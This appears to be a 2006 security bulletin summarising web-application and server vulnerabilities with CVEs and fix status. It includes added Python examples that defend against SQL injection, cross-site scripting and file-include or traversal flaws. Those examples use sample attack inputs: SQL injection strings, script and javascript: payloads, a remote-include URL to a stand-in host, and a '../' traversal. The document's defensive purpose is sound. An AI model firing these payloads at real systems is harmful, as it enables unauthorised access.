Several vulnerabilities have been reported: Cross-Site Scripting vulnerabilities were reported in 'post.php' due to insufficient sanitization of the 'tname' and 'fpost' parameters, in 'editac.php' due to insufficient sanitization of the 'fullname,' 'emailadd,' 'country,' 'sig,' and 'otherav' parameters, and in 'register.php' due to insufficient sanitization of the 'fullname,' 'emailadd,' and 'country' parameters, which could let a remote malicious user execute arbitrary HTML and script code; and SQL injection vulnerabilities were reported in 'accounts.php,' 'changep.php,' 'editac.php,' 'feedback.php,' 'fpass.php,' 'login.php,' 'post.php,' 'reply.php,' and 'reply_log.php' due to insufficient sanitization of the 'username' parameter, in 'dpost.php' due to insufficient sanitization of the 'p' parameter, in 'ndis.php' and 'list.php' due to insufficient sanitization of the 'c' parameter, and in 'search.php' due to insufficient sanitization of the 'q' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through use of a web client.

AWebBB Multiple Input Validation

CVE-2006-1637
CVE-2006-1638

2.3
(CVE-2006-1637)

1.9
(CVE-2006-1638)

Secunia Advisory: SA19486, April 3, 2006

Barracuda Networks

Barracuda Spam Firewall with firmware prior to 3.3.03.022 and with spamdef prior to 3.0.10045

Several buffer overflow vulnerabilities have been reported: a buffer overflow vulnerability was reported when a remote malicious user submits email that contains a specially crafted LHA archive with a long filename, which could lead to the execution of arbitrary code; and a buffer overflow vulnerability was reported when a remote malicious user submits an email that contains a specially crafted ZOO archive, which could lead to the execution of arbitrary code.

Update to firmware version 3.3.03.022.

Currently we are not aware of any exploits for these vulnerabilities.

Barracuda Spam Firewall Buffer Overflows

CVE-2004-0234
CVE-2006-0855

10
(CVE-2004-0234)

3.9
(CVE-2006-0855)

Security Tracker Alert ID: 1015866, April 4, 2006

BASE Basic Analysis and Security Engine

BASE Basic Analysis and Security Engine 1.2-1.2.2

A vulnerability has been reported in 'base_maintenance.php' due to an unspecified error, which could let a remote malicious user bypass authentication mechanisms.

Updates available

Vulnerability could be exploited with a web client.

Basic Analysis and Security Engine Authentication Bypass

CVE-2006-1505

2.3

Secunia Advisory: SA19510, April 3, 2006

Cisco Systems

CSS11500 Content Services Switch 7.30 (00.09)S, 7.30 (00.08)S, 7.20 (03.10)S, 7.20 (03.09)S, 7.10 (05.07)S, 7.5, 7.4

A remote Denial of Service vulnerability has been reported in the HTTP compression functionality.

Workaround information

Currently we are not aware of any exploits for this vulnerability.

Cisco 11500 Content Services Switch Remote Denial of Service

CVE-2006-1631

2.3

Cisco Security Advisory, cisco-sa-20060405, April 5, 2006

Claroline

Claroline 1.7.4, 1.7.2, 1.6, rc1, beta, 1.5.4, 1.5.3, 1.5

Multiple vulnerabilities have been reported: a Directory Traversal vulnerability was reported in 'rqmkhtml.php' due to insufficient sanitization of the 'file' parameter before it is used to view files, which could let a remote malicious user obtain sensitive information; a Cross-Site Scripting vulnerability was reported in 'rqmkhtml.php' due to insufficient sanitization of the 'file' parameter before it is returned to the user, which could let a remote malicious user execute arbitrary HTML and script code; and a file include vulnerability was reported in 'claroline/learnPath/include/scormExport.inc.php' due to insufficient verification of the 'includePath' parameter before it is used to include files, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client; however, Proof of Concept exploit scripts, claroline-1.7.4-remote-and-local-file-include.php and claroline_174_incl_xpl.html, have been published.

Claroline Multiple Vulnerabilities

CVE-2006-1594
CVE-2006-1595
CVE-2006-1596

7
(CVE-2006-1594)

2.3
(CVE-2006-1595)

4.9
(CVE-2006-1596)

Secunia Advisory: SA19461, April 3, 2006

CzarNews

CzarNews 1.14

Several vulnerabilities have been reported: a script insertion vulnerability was reported in 'news.php' due to insufficient sanitization of the 'email' parameter, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'cn_auth.php' due to insufficient sanitization of the 'usern' and 'passw' parameters, in 'news.php' due to insufficient sanitization of the 's' parameter, and in 'dpost.php' due to insufficient sanitization of the 'a' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities could be exploited with a web client.

CzarNews Script Insertion & SQL Injection

CVE-2006-1640
CVE-2006-1641

2.3
(CVE-2006-1640)

Secunia Advisory: SA19541, April 5, 2006

dbbs.sup.fr

DbbS 2.0-alpha & prior

An SQL injection vulnerability has been reported in 'topics.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

DbbS SQL Injection

CVE-2006-1579

7

Security Focus, Bugtraq ID: 17338, March 31, 2006

DIA

DIA 0.87-0.94

Multiple remote buffer overflow vulnerabilities have been reported due to a failure to properly bounds-check user-supplied input before copying it into insufficiently sized memory buffers, which could let a remote malicious user execute arbitrary code.

The vendor has released version 0.95-pre6, along with a patch for 0.94 to address these issues.

Mandriva

Ubuntu

Fedora

Debian

Currently we are not aware of any exploits for these vulnerabilities.

DIA XFIG File Import Multiple Remote Buffer Overflows

CVE-2006-1550

5.6

Security Focus, Bugtraq ID: 17310, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:062, April 3, 2006

Debian Security Advisory, DSA-1025-1, April 6, 2006

Esqlanelapse

Esqlanelapse 2.2, 2.0

A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of unspecified parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

Vulnerability could be exploited with a web client.

Esqlanelapse Cross-Site Scripting

CVE-2006-1570

2.3

Security Focus, Bugtraq ID: 17331, April 1, 2006

Exponent

Exponent CMS prior to 0.96.5 RC 1

Vulnerabilities have been reported in the banner module and image functionality due to unspecified input validation errors, which could let a remote malicious user execute arbitrary PHP code.

The vendor has released version 0.96.5-RC1 to address this issue.

Vulnerabilities can be exploited through a web client.

Exponent CMS Arbitrary Script Execution

CVE-2006-1604
CVE-2006-1605
CVE-2006-1606
CVE-2006-1607

7
(CVE-2006-1604)

7
(CVE-2006-1605)

2.3
(CVE-2006-1606)

7
(CVE-2006-1607)

Security Focus, Bugtraq ID: 17357, April 3, 2006

Fred Scalliet

Blank'N'Berg 0.2

Several vulnerabilities have been reported: a Directory Traversal vulnerability was reported due to insufficient validation of the '_path' parameter, which could let a remote malicious user obtain sensitive information; and a Cross-Site Scripting vulnerability was reported in 'index.php' due to insufficient sanitization of the '_path' parameter before displaying, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities may be exploited with a web client; however, Proof of Concept exploits have been published.

Blank'N'Berg Directory Traversal & Cross-Site Scripting

CVE-2006-1581
CVE-2006-1582

4.7
(CVE-2006-1581)

4.7
(CVE-2006-1582)

Security Tracker Alert ID: 1015854, March 31, 2006

gtd-php

gtd-php 0.5

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of input passed to various fields in 'newProject.php,' 'newList.php,' 'newWaitingOn.php,' 'newChecklist.php,' 'newContext.php,' 'newCategory.php,' and 'newGoal.php' before using, which could let a remote malicious user execute arbitrary HTML and script code; and a Script Insertion vulnerability was reported due to insufficient sanitization of the 'listTitle' parameter in 'listReport.php,' in 'projectReport.php' due to insufficient sanitization of the 'projectName' parameter, and in 'checklistReport.php' due to insufficient sanitization of the 'checklistTitle' parameter, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited via a web client.

gtd-php Cross-Site Scripting & Script Insertion

CVE-2006-1479

2.3

Secunia Advisory: SA19512, April 3, 2006

Hitachi

Groupmax World Wide Web 2.x, 3.x, World Wide Web Desktop 5.x, 6.x, World Wide Web Desktop for Jichitai 6.x,World Wide Web Desktop for Scheduler 5.x, World Wide Web for Scheduler 2.x, 3.x

A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of unspecified parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

Update information

Vulnerability can be exploited through a web client.

Hitachi Groupmax World Wide Web Cross-Site Scripting

CVE-2006-1574

4.7

Hitachi Security Advisory, HS06-005, March 31, 2006

Horde

Horde 3.0-3.0.9, 3.1

A vulnerability has been reported in Help Viewer which could let a remote malicious user execute arbitrary PHP code.

Updates available

SuSE

Gentoo

Vulnerability can be exploited via a web client.

Horde Help Viewer Remote PHP Code Execution

CVE-2006-1491

7

Security Focus, Bugtraq ID: 17292, March 29, 2006

SUSE Security Summary Report, SUSE-SR:2006:007, March 31, 2006

Gentoo Linux Security Advisory, GLSA 200604-02, April 4, 2006

Interact

Interact 2.1, 2.1.1

Multiple vulnerabilities have been reported: a vulnerability was reported in the 'login.php' script because different error responses are returned depending on whether the username is valid or invalid, which could let a remote malicious user obtain sensitive information; a vulnerability was reported due to insufficient sanitization of the 'search_terms' parameter in 'search.php' and various fields when creating an account, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'login.php' due to insufficient sanitization of the 'user_name' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

Interact Multiple Vulnerabilities

CVE-2006-1642
CVE-2006-1643
CVE-2006-1644

Not Available

Secunia Advisory: SA19488, April 5, 2006

ISPofEgypt

Site Man 0

An SQL injection vulnerability has been reported in 'admin_login.asp' due to insufficient sanitization of the 'txtpassword' parameter before using in a SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

SiteMan SQL Injection

CVE-2006-1586

7

Secunia Advisory: SA19500, April 3, 2006

Jaakko Keranen

Doomsday Engine 1.9, 1.8.6

Format string vulnerabilities have been reported in the 'Con_Message()' and 'conPrintf()' functions when connecting to port 13209/tcp and passing a specially crafted JOIN command, which could let a remote malicious user cause a Denial of Service or execute arbitrary code.

Gentoo

Vulnerabilities can be exploited by connecting to the server's network port; a Proof of Concept exploit has been published.

Doomsday Engine Format Strings

CVE-2006-1618

7

Security Tracker Alert ID: 1015860, April 4, 2006

Gentoo Linux Security Advisory, GLSA 200604-05, April 6, 2006

KGB

KGB Archiver 1.1.5 21

A Directory Traversal vulnerability has been reported when decompressing archives due to an input validation error, which could let a remote malicious user obtain sensitive information.

Update available

There is no exploit code required.

KGB Archiver Directory Traversal

CVE-2006-1611

2.3

Secunia Advisory: SA19511, April 3, 2006

lucidCMS

lucidCMS 2.0.0 RC4

Cross-Site Scripting vulnerabilities have been reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

LucidCMS Cross-Site Scripting

CVE-2006-1634
CVE-2006-1635

2.3
(CVE-2006-1634)

2.3
(CVE-2006-1635)

Security Focus, Bugtraq ID: 17360, April 3, 2006

Mantis

Mantis 1.0.1, 1.0.0rc5 & prior

Cross-Site Scripting vulnerabilities have been reported in 'view_all_set.php' due to insufficient sanitization of the 'start_day,' 'start_year,' and 'start_month' parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploit has been published.

Mantis Cross-Site Scripting

CVE-2006-1577

7

Security Focus, Bugtraq ID: 17326, March 31, 2006

mediaslash.com

MediaSlash Gallery 0

A file include vulnerability has been reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

MediaSlash Gallery Remote File Include

CVE-2006-1573

7

Security Focus, Bugtraq ID: 17323, March 30, 2006

MyBB Group

MyBulletinBoard 1.10

An HTML injection vulnerability has been reported due to insufficient sanitization of the 'email' BBcode tag when posting a message, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited via a web client.

MyBulletinBoard Email HTML Injection

CVE-2006-1625

7

Security Focus, Bugtraq ID: 17368, April 4, 2006

MySQL AB

MySQL 5.0.18

A vulnerability has been reported in query logging because the server executes a query in full while the logging code treats a NUL byte in the query data as its end, which could let a remote malicious user run statements that are not recorded in the query log.

Mandriva

A Proof of Concept exploit has been published.

MySQL Query Logging Bypass

CVE-2006-0903

4.9

Security Focus, Bugtraq ID: 16850, February 27, 2006

Mandriva Security Advisory, MDKSA-2006:064, April 3, 2006

NetBSD

NetBSD 3.0, 2.1, 2.0-2.0.3, 1.6-1.6.2

A vulnerability has been reported in 'if_bridge(4)' because stack memory is not zeroed before being copied out to userland by ioctl calls, which could let a malicious user obtain sensitive information from kernel memory.

Patches available

Currently we are not aware of any exploits for this vulnerability.

NetBSD Information Disclosure

CVE-2006-1588

1.6

NetBSD Security Advisory, NetBSD-SA2006-005, March 30, 2006

NetBSD

NetBSD 1.x

A vulnerability has been reported because the 'mail' program creates the file that records outgoing messages with insecure permissions when the 'set record' setting is present in a user's .mailrc and the default umask is in effect, which could let a local malicious user read that file and obtain sensitive information.

Patch information

Currently we are not aware of any exploits for this vulnerability.

NetBSD mail(1) Insecure File Permissions

CVE-2006-1587

1.6

NetBSD Security Advisory, NetBSD-SA2006-007, March 30, 2006

o2php.com

Oxygen 1.1-1.1.3

An SQL injection vulnerability has been reported in 'post.php' due to insufficient sanitization of the 'fid' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

Oxygen SQL Injection

CVE-2006-1572

2.3

Secunia Advisory: SA19481, March 31, 2006

PHP Group

PHP 4.3.x, 4.4.x, 5.0.x, 5.1.x

A vulnerability has been reported in the 'html_entity_decode()' function because it is not binary safe, which could let a remote malicious user obtain sensitive information.

The vulnerability has been fixed in the CVS repository and in version 5.1.3-RC1.

Mandriva

There is no exploit code required; however, a Proof of Concept exploit has been published.

PHP Information Disclosure

CVE-2006-1490

2.3

Secunia Advisory: SA19383, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:063, April 2, 2006

phpBB Group

phpBB 2.0.19

A Cross-Site Scripting vulnerability has been reported in 'profile.php' due to insufficient sanitization of the 'cur_password' parameter before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through use of a web client.

phpBB Cross-Site Scripting

CVE-2006-1603

2.3

Secunia Advisory: SA19494, April 3, 2006

phpMyChat

phpMyChat 0.14.5, 0.14.4

An SQL injection vulnerability has been reported in 'MessagesL.PHP3' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, phpMyChat_0.14.5_SQLINJ.php, has been published.

PHPMyChat SQL Injection

Not Available

Security Focus, Bugtraq ID: 17382, April 5, 2006

PHPNuke-Clan

PHPNuke-Clan 3.0.1

A file include vulnerability has been reported in 'modules/vWar_account/includes/functions_common.php' due to insufficient verification of the 'vwar_root' parameter before using to include files, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, pnc.pl.txt, has been published.

PHPNuke-Clan Remote File Include

CVE-2006-1602

7

Security Focus, Bugtraq ID: 17356, April 3, 2006

PHPSelect

Submit-A-Link 0

An HTML injection vulnerability has been reported in 'index.php' due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, Proof of Concept exploit scripts, linksubmit_poc.pl and linksubmit.txt, have been published.

PHPSelect Submit-A-Link HTML Injection

CVE-2006-1622

7

Security Focus, Bugtraq ID: 17348, April 1, 2006

r2xDesign

qliteNews 2005.07.01

An SQL injection vulnerability has been reported in 'loginprocess.php' due to insufficient sanitization of the 'username' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client.

qliteNews SQL Injection

CVE-2006-1571

5.6

Secunia Advisory: SA19476, March 31, 2006

redcms.co.uk

RedCMS 0.1

Several vulnerabilities have been reported: a script insertion vulnerability was reported in 'register.php' due to insufficient sanitization of the 'Email,' 'Location,' and 'website' fields before storing in a member's profile, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'login.php' and 'register.php' due to insufficient sanitization of the 'username' parameter and in 'profile.php' due to insufficient sanitization of the 'u' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client.

RedCMS SQL Injection & Script Insertion

CVE-2006-1568
CVE-2006-1569

5.6
(CVE-2006-1568)

5.6
(CVE-2006-1569)

Secunia Advisory: SA19475, March 31, 2006
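The login injections reported above for Interact ('user_name' in login.php), SiteMan ('txtpassword' in admin_login.asp), qliteNews ('username' in loginprocess.php) and RedCMS ('username' in login.php and register.php) share one root cause: the submitted credential is spliced into the SQL text. The Python below is an added example and is not code from any of those products. It uses an in-memory SQLite table with one constructed user row to show the bypass against a string-built query, the parameterised form that defeats it, and a single failure message that also removes the user-name enumeration reported for Interact's login.php.

```python
import sqlite3


def make_db():
    """Create an in-memory user table with one constructed row (sample data
    for this example only; a real application stores a password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn, user_name, password):
    """The pattern behind the login.php-style reports: the credential text is
    spliced into the SQL string, so quotes and comments in it become SQL."""
    sql = ("SELECT user_name FROM users WHERE user_name = '%s' "
           "AND password = '%s'" % (user_name, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, user_name, password):
    """Same check with a parameterised query: the driver binds both values as
    data, so a quote or '--' in the user name cannot change the statement."""
    row = conn.execute(
        "SELECT user_name FROM users WHERE user_name = ? AND password = ?",
        (user_name, password),
    ).fetchone()
    return row[0] if row else None


def login_message(conn, user_name, password):
    """Return one generic failure string whether or not the account exists, so
    the response cannot be used to enumerate valid user names (the Interact
    login.php issue)."""
    if login_hardened(conn, user_name, password) is None:
        return "Invalid user name or password"
    return "Welcome, " + user_name


if __name__ == "__main__":
    db = make_db()
    # "alice' --" closes the quoted user name and comments out the password
    # comparison, so the string-built query succeeds with a wrong password.
    print(login_vulnerable(db, "alice' --", "wrong"))   # alice
    print(login_hardened(db, "alice' --", "wrong"))     # None
    print(login_message(db, "alice", "wrong"))
    print(login_message(db, "nobody", "wrong"))          # identical text
```

The `--` payload is only one of several; `' OR '1'='1` works the same way against the string-built query and fails the same way against the bound parameters, because the driver never parses the bound value as SQL.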

ReloadCMS

ReloadCMS 1.2.5

A vulnerability has been reported due to insufficient sanitization of the 'User-Agent' header field in an HTTP request before displaying, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

There is no exploit code required; however, a Proof of Concept exploit script, reloadcms_poc, has been published.

ReloadCMS HTML Injection

CVE-2006-1645

Not Available

Security Focus, Bugtraq ID: 17353, April 2, 2006
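The ReloadCMS entry above (the 'User-Agent' header echoed into a page) and the MyBulletinBoard entry (the 'email' BBcode tag turned into a link) are two faces of the same defect that also appears in the reflected cross-site scripting reports for Mantis, phpBB and gtd-php: attacker-chosen text reaches HTML without encoding, or reaches an href without a scheme check. The Python below is an added example, not code from any of those projects; the header dictionary and link values are constructed inputs. It escapes text for a text node or attribute, and for a user-supplied link target it strips the whitespace characters browsers ignore inside a scheme and then allow-lists the scheme, so a `javascript:` target is rendered as plain text instead of a link.

```python
import html
from urllib.parse import urlsplit

# Link targets a user may supply; anything else (javascript:, data:, vbscript:)
# is dropped and only the label is shown as plain text.
ALLOWED_LINK_SCHEMES = ("http", "https", "mailto")


def render_text(untrusted):
    """Escape untrusted text for an HTML text node or a quoted attribute."""
    return html.escape(untrusted, quote=True)


def render_link(href, label):
    """Build an anchor from a user-supplied target such as an [email=] tag
    value. Tab, CR and LF are removed first because browsers ignore them
    inside a scheme ("java\\tscript:"), then the scheme is allow-listed."""
    cleaned = "".join(c for c in href if c not in "\t\r\n").strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme not in ALLOWED_LINK_SCHEMES:
        return render_text(label)          # relative and script URLs: no link
    return '<a href="%s">%s</a>' % (render_text(cleaned), render_text(label))


def render_visitor_row(request_headers):
    """Show a visitor's browser string (the User-Agent case): the header is
    attacker-chosen and must be escaped like any other input."""
    user_agent = request_headers.get("User-Agent", "")
    return "<td>%s</td>" % render_text(user_agent)


if __name__ == "__main__":
    # Constructed inputs for the demonstration.
    print(render_visitor_row({"User-Agent": "<script>alert(1)</script>"}))
    print(render_link("javascript:alert(document.cookie)", "mail me"))
    print(render_link("mailto:alice@example.org", "mail me"))
```

Escaping on output rather than "sanitizing" on input is the durable fix: the same stored value may later be placed in a text node, an attribute and a URL, and each context needs its own encoding.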

SkinTech

X-Changer 0.2

SQL injection vulnerabilities have been reported in 'index.php' due to insufficient sanitization of the 'from,' 'into,' and 'id' parameters before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploit has been published.

X-Changer SQL Injection

CVE-2006-1557

7

Secunia Advisory: SA19459, March 31, 2006

SoftBiz

Image Gallery 0

Multiple SQL injection vulnerabilities have been reported due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

Softbiz Image Gallery Multiple SQL Injection

Not Available

Security Focus, Bugtraq ID: 17339, March 31, 2006

v-creator.com

v-creator prior to 1.3-pre3

A vulnerability has been reported in 'VCEngine.php' due to an input validation error in the 'enrypt()' and 'decrypt()' functions, which could let a remote malicious user execute arbitrary shell commands.

Vulnerability has been fixed in version 1.3-pre3.

Vulnerability can be exploited via a web client.

V-creator Remote Shell Code Execution

CVE-2006-1599

7

Security Focus, Bugtraq ID: 17328, April 3, 2006

vscripts.pl

QLnews 1.2

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'autorx' and 'newsx' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; and a vulnerability was reported in 'admin.php' due to insufficient sanitization of input passed to configuration parameters before storing in 'config.php', which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client.

QLnews Multiple Input Validation

CVE-2006-1575
CVE-2006-1576

7
(CVE-2006-1575)

7
(CVE-2006-1576)

Security Focus, Bugtraq ID: 17335, April 3, 2006

vscripts.pl

VBook 2.0

Multiple vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'autor,' 'email,' 'www,' 'temat,' and 'tresc' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; an SQL injection vulnerability was reported in 'index.php' due to insufficient sanitization of the 'x' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported in 'config.php' due to insufficient sanitization of configuration parameters in 'admin.php' before storing, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

VBook Input Validation

CVE-2006-1561
CVE-2006-1562
CVE-2006-1563

5.6
(CVE-2006-1561)

7
(CVE-2006-1562)

8
(CVE-2006-1563)

Secunia Advisory: SA19448, March 30, 2006

vscripts.pl

VNews 1.2

Multiple vulnerabilities have been reported: an SQL injection vulnerability was reported in 'admin/admin.php' due to insufficient sanitization of the 'loginvar' parameter, in 'news.php' due to insufficient sanitization of the 'news' parameter, and in 'news.php' due to insufficient sanitization of the 'nom' parameter, which could let a remote malicious user execute arbitrary SQL code; a Cross-Site Scripting vulnerability was reported in 'news.php' due to insufficient sanitization of the 'autorkomentarza' and 'tresckomentarza' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; and a vulnerability was reported in the administration section due to insufficient sanitization of variables edited in 'admin/config.php' before storing, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

VNews Multiple Input Validation

CVE-2006-1543
CVE-2006-1544
CVE-2006-1545

7
(CVE-2006-1543)

2.3
(CVE-2006-1544)

6
(CVE-2006-1545)

Secunia Advisory: SA19435, March 30, 2006

VWar

VWar 1.3-1.5

A file include vulnerability was reported in 'get_header.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit script, VWar_1.5.0_R12.pl, has been published.

VWar Remote File Include

CVE-2006-1636

7 Security Focus, Bugtraq ID: 17358, April 3, 2006

VWar

VWar 1.5 & prior

A file include vulnerability has been reported in 'include/functions_install.php' due to insufficient verification of the 'vwar_root' parameter before using to include files, which could let a remote malicious user execute arbitrary PHP code.

Updates available

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit script, VWar_1.5.0_RCE.php, has been published.

Virtual War File Inclusion

CVE-2006-1503

5.6

Secunia Advisory: SA19438, March 29, 2006

Secunia Advisory: SA19438, April 4, 2006
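The file include and directory traversal entries above (Blank'N'Berg's '_path' parameter, the archive entry names in KGB Archiver, and the include paths in MediaSlash Gallery, PHPNuke-Clan and VWar via 'vwar_root') all reduce to one mistake: a name the attacker controls is joined to a trusted base and then used as a path. The Python below is an added example and not any of those projects' code; BASE_DIR, the include file name and the sample archive members are assumptions for the demonstration. It refuses URL schemes (the remote include case), absolute paths, NUL bytes and any normalised result that leaves the base directory, and applies the same check to archive members before extraction.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed web root for the example; not a path from any reported product.
BASE_DIR = "/var/www/app"


def resolve_under_base(base, untrusted):
    """Join an untrusted name to a trusted base directory.

    Returns the normalised absolute path, or None when the name contains a
    NUL byte, carries a URL scheme (remote include), is absolute, or
    normalises to a location outside base (../ traversal)."""
    base = posixpath.normpath(base)
    prefix = base if base.endswith("/") else base + "/"
    if "\x00" in untrusted:                 # C-string truncation tricks
        return None
    # Any scheme (http:, ftp:, php:, and also a drive letter like c:) is refused.
    if urlsplit(untrusted).scheme:
        return None
    if posixpath.isabs(untrusted):
        return None
    joined = posixpath.normpath(posixpath.join(base, untrusted))
    if joined != base and not joined.startswith(prefix):
        return None
    return joined


def include_path(vwar_root_param):
    """Model of the 'vwar_root' include: the parameter may only select a
    directory inside BASE_DIR, and the file name itself is fixed by the code
    (assumed name, not the product's real file)."""
    root = resolve_under_base(BASE_DIR, vwar_root_param)
    if root is None:
        return None
    return posixpath.join(root, "includes", "functions_common.php")


def safe_extract_paths(dest, member_names):
    """Map archive member names to destination paths, refusing any member
    (including backslash-separated ones) that would land outside dest."""
    out = {}
    for name in member_names:
        target = resolve_under_base(dest, name.replace("\\", "/"))
        if target is None:
            raise ValueError("refusing archive entry outside %s: %r" % (dest, name))
        out[name] = target
    return out


if __name__ == "__main__":
    for param in ("includes", "../../etc", "http://evil.example/"):
        print(repr(param), "->", include_path(param))
    print(safe_extract_paths("/tmp/out", ["docs/a.txt"]))
```

The decision is made on the normalised result, not on the presence of `..` in the raw string, so encodings such as `a/../../b` or backslash separators are caught by the same comparison; for includes, the stronger fix is to derive the root from the script's own location and not accept it from the request at all.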

WebAPP

WebAPP 0.9.9.3.2

Cross-Site Scripting vulnerabilities have been reported due to insufficient sanitization of unspecified input before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

WebAPP Cross-Site Scripting

CVE-2006-1427

2.3

Secunia Advisory: SA19506, April 3, 2006

Websina

Bugzero 4.3.1

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'msg' parameter in various scripts and in 'edit.jsp' due to insufficient sanitization of the 'entryId' parameter, which could let a remote malicious user execute arbitrary HTML and script code; and a Cross-Site Scripting vulnerability was reported in 'edit.jsp' due to insufficient sanitization of the 'projectId' parameter and in 'error.jsp' due to insufficient sanitization of the 'error' parameter, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

Bugzero Multiple Cross-Site Scripting

CVE-2006-1580

4.7

Security Focus, Bugtraq ID: 17351, April 3, 2006

Wire Plastik Design

wpBlog 0.4

An SQL injection vulnerability has been reported in 'index.php' due to insufficient sanitization of the 'postid' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client.

wpBlog SQL Injection

CVE-2006-1639

5.6

Secunia Advisory: SA19538, April 4, 2006

ZDaemon / X-Doom

ZDaemon 1.08.01, X-Doom VI 1.6.7

Several vulnerabilities have been reported: a buffer overflow vulnerability was reported in the 'is_client_wad_ok' function, which could let a remote malicious user execute arbitrary code; and a remote Denial of Service vulnerability was reported in the 'ZD_MissingPlayer(),' 'ZD_UseItem(),' and 'ZD_ValidClient()' functions when an invalid value is submitted.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, zdaebof.zip, has been published.

Zdaemon Remote Buffer Overflow & Denial of Service

CVE-2006-1592
CVE-2006-1593

7
(CVE-2006-1592)

2.3
(CVE-2006-1593)

Security Focus, Bugtraq ID: 17340, March 31, 2006


Wireless Trends & Vulnerabilities
This section contains wireless vulnerabilities, articles, and malicious code that has been identified during the current reporting period.
